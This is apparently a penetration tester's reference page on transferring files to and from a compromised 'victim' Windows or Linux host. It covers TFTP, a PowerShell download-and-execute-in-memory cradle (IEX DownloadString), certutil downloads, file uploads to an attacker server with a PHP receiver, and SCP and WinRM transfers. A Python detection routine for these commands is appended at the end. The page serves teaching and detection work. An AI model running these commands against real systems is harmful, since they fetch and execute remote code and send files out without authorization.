Particle42
File Transfers

TFTP

Trivial FTP (TFTP) is one of the simplest ways to transfer files between two systems. Windows 7 and above offer several ways to transfer files, such as FTP and PowerShell, but the problem arises when the system is older than Windows 7.

TFTP is present by default on older operating systems such as Windows XP, and it is a great tool for transferring files non-interactively.

Once the atftpd service is installed on your Linux system, you can use the following commands to transfer files.

sudo atftpd --daemon --port 69 /tftp

The above command starts the TFTP server on your local system, serving the /tftp directory. The following command transfers a file into or out of the victim's system:

tftp -i 192.168.1.1 put evil.file

Powershell

PowerShell on Windows can be used to transfer files between systems. There are two popular methods, Invoke-WebRequest and WebClient; both use HTTP to download files from, or upload files to, a server.

You need a web server running in order to download files from it or upload files to it. An Apache server with PHP is ideal for transferring files in both directions. As a makeshift, you can also use Python to start a web server for downloads. The following command starts a web server with Python:

sudo python3 -m http.server 80

To download a file to a Windows machine using WebClient:

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/evil.php', 'new-exploit.php')

Building on the previous command, WebClient can also download a script and execute it in memory, without saving it on the victim's system:

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.1/hello.ps1')

To upload a file from a Windows machine using WebClient:

powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.1.1/upload.php', 'evil.php')

Make sure the complete path of the file is given when using UploadFile.

To download a file to a Windows machine using Invoke-WebRequest:

powershell.exe (Invoke-WebRequest http://192.168.1.1/evil.php -OutFile evil.php)

To upload a file from a Windows machine using Invoke-WebRequest:

powershell.exe (Invoke-WebRequest http://192.168.1.1/upload.php -Method Put -InFile C:\Users\Administrator\Desktop\evil.txt -UseBasicParsing)

In the last command the method Put is used instead of Post to avoid elaborate preparation of the HTTP request on the client's side. Because Put is used, matching PHP code has to be deployed on the server to receive the file.

The following is a sample of PHP code that receives an uploaded file. PHP only fills $_FILES for a multipart/form-data POST (which is what WebClient.UploadFile sends); a raw Put body from Invoke-WebRequest -InFile has to be read from php://input instead, so the sample handles both cases:

<?php
$uploaddir = '/var/www/uploads/';
if (!empty($_FILES['file'])) {
    // multipart/form-data POST, e.g. WebClient.UploadFile: PHP has already parsed the upload
    move_uploaded_file($_FILES['file']['tmp_name'], $uploaddir . basename($_FILES['file']['name']));
} else {
    // raw body, e.g. Invoke-WebRequest -Method Put -InFile: $_FILES is empty, read the body directly
    file_put_contents($uploaddir . 'upload.bin', file_get_contents('php://input'));
}
?>

SCP

SCP is a network protocol for transferring files securely between Linux systems. By default it connects over SSH on port 22. You need the username and password of the remote server to which the file is being transferred. The following command is a sample file transfer:

scp file.txt remote_username@192.168.1.1:/Directory/Path

Certutils

certutil is a Windows tool that can be used to download files to the local system:

certutil.exe -urlcache -f http://192.168.1.1/test.exe test.exe

Winrm

When connected to a system over WinRM, the tool can be used both to upload and to download files:

upload <Filename-fullpath> <Upload path full>
download <Filename-fullpath> <Download Path full>
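As an added defensive example, not part of the original notes: a small Python triage routine that flags the transfer commands shown on this page (certutil -urlcache, WebClient download cradles, Invoke-WebRequest uploads and downloads, tftp -i) in process-creation records. The sample records and the rule names are constructed for this example, and the IP/URL values are the ones used in the commands above.

```python
import re

# Constructed sample process-creation records (image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil.exe -urlcache -f http://192.168.1.1/test.exe test.exe"),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.1/hello.ps1')"),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe (Invoke-WebRequest http://192.168.1.1/upload.php -Method Put "
     "-InFile C:\\Users\\Administrator\\Desktop\\evil.txt -UseBasicParsing)"),
    ("C:\\Windows\\System32\\tftp.exe", "tftp -i 192.168.1.1 put evil.file"),
    ("C:\\Windows\\System32\\certutil.exe", "certutil.exe -hashfile C:\\setup.msi SHA256"),  # benign
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "powershell.exe Get-Process"),  # benign
]

# (rule name, image regex, command-line regex); most specific rules first.
RULES = [
    ("certutil-urlcache-download", r"certutil\.exe$", r"(?i)-urlcache\b.*https?://"),
    ("powershell-download-cradle", r"powershell\.exe$", r"(?i)\bIEX\b.*DownloadString\("),
    ("powershell-webclient-file", r"powershell\.exe$", r"(?i)System\.Net\.WebClient\)\.(DownloadFile|UploadFile)\("),
    ("powershell-iwr-upload", r"powershell\.exe$", r"(?i)Invoke-WebRequest\b.*-Method\s+Put\b.*-InFile\b"),
    ("powershell-iwr-download", r"powershell\.exe$", r"(?i)Invoke-WebRequest\b.*-OutFile\b"),
    ("tftp-binary-transfer", r"tftp\.exe$", r"(?i)\btftp\b.*\s-i\s.*\b(put|get)\b"),
]

URL_RE = re.compile(r"https?://[^\s'\")]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def classify(image, cmdline):
    """Return the first matching rule name, or None when no transfer pattern matches."""
    for name, image_re, cmd_re in RULES:
        if re.search(image_re, image, re.IGNORECASE) and re.search(cmd_re, cmdline):
            return name
    return None

def extract_remote(cmdline):
    """Pull the remote endpoint (URL, else bare IPv4) out of a command line."""
    m = URL_RE.search(cmdline) or IP_RE.search(cmdline)
    return m.group(0) if m else None

def triage(events):
    """Return (rule, remote, cmdline) for every event matching a rule; benign ones are dropped."""
    hits = []
    for image, cmdline in events:
        rule = classify(image, cmdline)
        if rule:
            hits.append((rule, extract_remote(cmdline), cmdline))
    return hits
```

The benign certutil -hashfile and Get-Process records are included to show that the rules key on the download/upload arguments, not on the binary alone.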

Last updated 1 year ago
